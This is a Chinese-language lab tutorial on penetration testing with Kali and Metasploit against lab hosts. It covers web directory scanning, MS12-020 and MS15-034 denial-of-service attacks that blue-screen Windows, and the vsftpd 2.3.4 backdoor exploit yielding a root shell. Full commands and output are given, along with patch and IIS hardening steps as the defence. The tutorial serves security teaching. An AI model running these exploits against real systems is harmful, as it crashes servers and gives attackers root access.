kali系统渗透

用kali远程ssh时，如果不能的话按照以下方法

┌──(root㉿kali)-[~]
└─# mkdir ~/.ssh
┌──(root㉿kali)-[~]
└─# vim ~/.ssh/config
Host *
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa

msfconlole -q //进入马上发不显示内容，所以加个q

msf6 > workspace -v //显示工作区详细信息
msf6 > hosts //查看扫描结果中的主机
msf6 > services -p 80 //查看扫描结果中80端口信息

1.网站目录扫描（Linux靶机)

第一步：查找辅助脚本，使用辅助脚本

msf6 > search dir_scan //搜索dir_scan脚本（找枪）
msf6 > use 0 //使用编号为0的脚本（端枪）
msf6 > set rhosts 192.168.10.143 //设置攻击目标（瞄准）
msf6 > run //运行脚本（开枪）
[] Detecting error code
[] Using code '404' as not found for 192.168.10.143
[+] Found http://192.168.10.143:80/cgi-bin/ 404 (192.168.10.143)
[+] Found http://192.168.10.143:80/doc/ 200 (192.168.10.143)
[+] Found http://192.168.10.143:80/icons/ 404 (192.168.10.143)
[+] Found http://192.168.10.143:80/index/ 404 (192.168.10.143)
[+] Found http://192.168.10.143:80/phpMyAdmin/ 200 (192.168.10.143)
[+] Found http://192.168.10.143:80/test/ 404 (192.168.10.143)

第二步：验证网站目录

在物理机浏览器访问： http://192.168.10.143/doc/ //查看网站列表

2、DOS攻击（Windows靶机）

1）MS12-020 远程桌面漏洞-死亡之蓝

CVE-2012-0002（MS12-020）漏洞，利用Windows系统的远程桌面协议（RDP）存在缓存溢出漏洞，攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏

msf6 > search ms12-020 //搜索ms12-020脚本
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS

一个是ID为0 有一个关键词scanner ，发扫描的脚本
一个是ID为1 有一个关键词dos ,是拒绝服务攻击的脚本

msf6 > use 1 //使用DOS攻击脚本
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.142 //设置攻击目标
msf6 auxiliary(scanner/rdp/ms12_020_check) > run //攻击

2）防御MS12-020漏洞

安装补丁Windows6.1-KB2621440-x64.msu

MSF漏洞利用Exploit应用

CVE-2011-2523 vsftpd 2.3.4 后门漏洞（笑脸漏洞），此漏洞允许以root身份执行任意命令

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.Command shell session 1 opened (0.0.0.0:0 -> 192.168.10.143:6200) //侵入成功
whoami //显示当前用户
root
pwd //查看当前目录
/root

CVE-2015-1635漏洞攻防实战

CVE-2015-1635（MS15-034）漏洞存在于HTTP协议堆栈(HTTP.sys)中，攻击者只要发送恶意http请求数据包，就可能远程读取IIS服务器的内存数据，或使服务器系统蓝屏崩溃

补丁文件：Windows6.1-KB3042553-x64

1）漏洞扫描（OpenVAS报告）
2）用poc脚本去验证漏洞真实存在
3）MSF漏洞利用，DOS攻击服务器蓝屏
4）对IIS安全加固：关闭内核缓存
5）MSF漏洞利用，服务器不再蓝屏，成功防御了攻击
6）把内核缓存在开启(内核缓存可加快网站性能)
7）对系统进行加固：安装系统补丁
8）用POC脚本测试，发现提示目标服务器补丁已修复
9）MSF漏洞利用，发现目标服务器不在蓝屏

1、漏洞扫描

2、POC 漏洞验证脚本

1）上传 cve-2015-1635.poc 到kali 系统

2）修改cve-2015-1635.poc 文件中的 ipaddr 为 win2k8 地址

ipAddr = "192.168.10.137"

3）开始验证

[root@kali ~] # python cve-2015-1635.poc //执行POC验证脚本
[*] Audit Started //审计开始
[!!] Looks VULN //看起来很脆弱（vulnerable）

3、漏洞利用

msf6 > search ms15-034
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
//检查W2K8 主机是否蓝屏

4、对IIS安全加固：关闭内核缓存

5、MSF漏洞利用，服务器不再蓝屏，成功防御了攻击

sf6 > search ms15-034
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
//再次使用攻击脚本去对目标服务器进行攻击，发现目标服务器不在蓝屏了

6、把内核缓存在开启(内核缓存可加快网站性能)

7、对系统进行加固：安装系统补丁

补丁：MS15-034-Windows6.1-KB3042553-x64-2008R2

如果安装不上，先安装SP1补丁集合（windows6.1-KB976932-X64）2012年12月发布查看已安装补丁：命令提示符下执行systeminfo

8、用POC脚本测试，发现提示目标服务器补丁已修复

[root@kali ~] python cve-2015-1635.poc
[*] Audit Started //开始审计
[*] Looks Patched //看起来补丁已修复

9、MSF漏洞利用，发现目标服务器不在蓝屏

msf6 > search ms15-034
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
[] Probably not vulnerable, will not dos it. //可能没有漏洞，就不攻击他了